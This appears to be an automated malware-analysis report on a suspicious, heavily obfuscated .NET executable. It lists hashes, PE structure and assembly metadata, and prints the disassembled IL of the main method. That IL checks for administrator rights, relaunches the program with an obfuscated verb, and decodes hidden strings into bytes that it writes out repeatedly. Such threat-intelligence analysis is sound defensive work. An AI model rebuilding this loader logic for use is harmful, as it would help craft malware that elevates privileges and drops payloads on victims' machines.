Suspicious
Suspect

588276ecb80a9d785bb64c2ab8a54229

PE Executable | MD5: 588276ecb80a9d785bb64c2ab8a54229 | Size: 2.76 MB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
588276ecb80a9d785bb64c2ab8a54229
Sha1
3e679bb523c6bc1cd9045a39ae5b62fdef404c46
Sha256
6d58aefc8df90394a08e40b717146de9ecca92e87b667f14e33c13cfb6ca3e09
Sha384
6d555232cb04b7356c4ae7d52a5a8c47993d988ed00d6022819d66855b6975a8743050a29d7899d180cc023b00ad919c
Sha512
4e60ce2f1c9eb010eedeb7faf47d226733ecc5751178d465a2c65dd030966248e754a5a1fadd2d63397ef258f52e17adf9811e6ed202b4f438d9b0aea6f7d6ab
SSDeep
49152:T86fOJvA7AdP+0EFlYRguMAadRNxYeS9HrnaJ9qoN4Qov+/z6d4GGPO3:A6fOJuumTOguOjY79HuX9t/z6dJ
TLSH
59D5184C7E43C960E2D42A3420E98FF96E8A1FDBD372B0467FD83A8165A7C1ACD94D54

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
[Authenticode]_b90f8885.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
hyZYVXHWcn
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Info

Authenticode present at 0x29DE00 size 14632 bytes

Module Name

WYigSWmryaBxUq

Full Name

WYigSWmryaBxUq

EntryPoint

System.Void qUbzDlnPcWCACM.PwJTUYPjczDUlvY.wxkSYGdDOuEAYzQ::oGcthBeOPlXOOw(System.String[])

Scope Name

WYigSWmryaBxUq

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

nFMMzxCpTQTmgD

Assembly Version

175.123.251.167

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.5

Total Strings

271

Main Method

System.Void qUbzDlnPcWCACM.PwJTUYPjczDUlvY.wxkSYGdDOuEAYzQ::oGcthBeOPlXOOw(System.String[])

Main IL Instruction Count

82

Main IL

call System.Void roSclhmMKGWACMe.OQchlUjKmBVMLo::SQGRfMOllodJOf()
call System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
newobj System.Void System.Security.Principal.WindowsPrincipal::.ctor(System.Security.Principal.WindowsIdentity)
ldc.i4 451
ldc.i4.s -93
sub <null>
callvirt System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
brtrue.s IL_005A: call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory()
call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess()
callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule()
callvirt System.String System.Diagnostics.ProcessModule::get_FileName()
stloc.2 <null>
nop <null>
ldloc.2 <null>
newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String)
dup <null>
ldstr GoSRZWUwmWKXNg
call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String)
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String)
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo)
pop <null>
ldc.i4.s -76
ldc.i4.s -76
sub <null>
call System.Void System.Environment::Exit(System.Int32)
leave.s IL_002E: nop
pop <null>
leave.s IL_002E: nop
call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory()
newobj System.Void System.Random::.ctor()
ldc.i4.s 49
ldc.i4.s 47
sub <null>
callvirt System.Int32 System.Random::Next(System.Int32)
ldc.i4.s -3
ldc.i4.s -4
sub <null>
beq.s IL_0081: ldstr "EqyWHVHyBYOCejO"
ldstr qPhcXFuThoFtAui
call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String)
br.s IL_008B: call System.String System.String::Concat(System.String,System.String)
ldstr EqyWHVHyBYOCejO
call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String)
call System.String System.String::Concat(System.String,System.String)
ldstr uShnCyJKMUkdUcU
call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String)
call System.Byte[] qUbzDlnPcWCACM.PwJTUYPjczDUlvY.PRYFyYDvTWCmiO::RXlsYyOGqdOSTmA(System.String)
call System.Text.Encoding System.Text.Encoding::get_ASCII()
ldstr EZFhPKcVHibyqr
call System.String DIVSteqjNPHKiv.xumfnVbWRNdakh::CNfpiBrZUmjfmw(System.String)
callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String)
stloc.0 <null>
ldloc.0 <null>
call System.Byte[] qUbzDlnPcWCACM.PwJTUYPjczDUlvY.ZxFOteTBKicjGj::SIYDcPstHQIcre(System.Byte[],System.Byte[])
stloc.1 <null>
dup <null>
ldloc.1 <null>
call System.Boolean JvYPdewvcZQXfEm.GLjNTTsGeWRGMny.aSJewDLkhBySpAD::NMosXIPZlmzQqb(System.String,System.Byte[])
pop <null>
ldc.i4.s 68
ldc.i4.s -32
sub <null>
call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32)
pop <null>
dup <null>
ldloc.1 <null>
call System.Boolean JvYPdewvcZQXfEm.GLjNTTsGeWRGMny.aSJewDLkhBySpAD::NMosXIPZlmzQqb(System.String,System.Byte[])
pop <null>
ldc.i4.3 <null>
ldc.i4.s -97
sub <null>
call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32)
pop <null>
ldloc.1 <null>
call System.Boolean JvYPdewvcZQXfEm.GLjNTTsGeWRGMny.aSJewDLkhBySpAD::NMosXIPZlmzQqb(System.String,System.Byte[])
pop <null>
ldc.i4 197
ldc.i4.s 97
sub <null>
call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32)
pop <null>
ret <null>


Characteristics
No malware configuration was found at this point.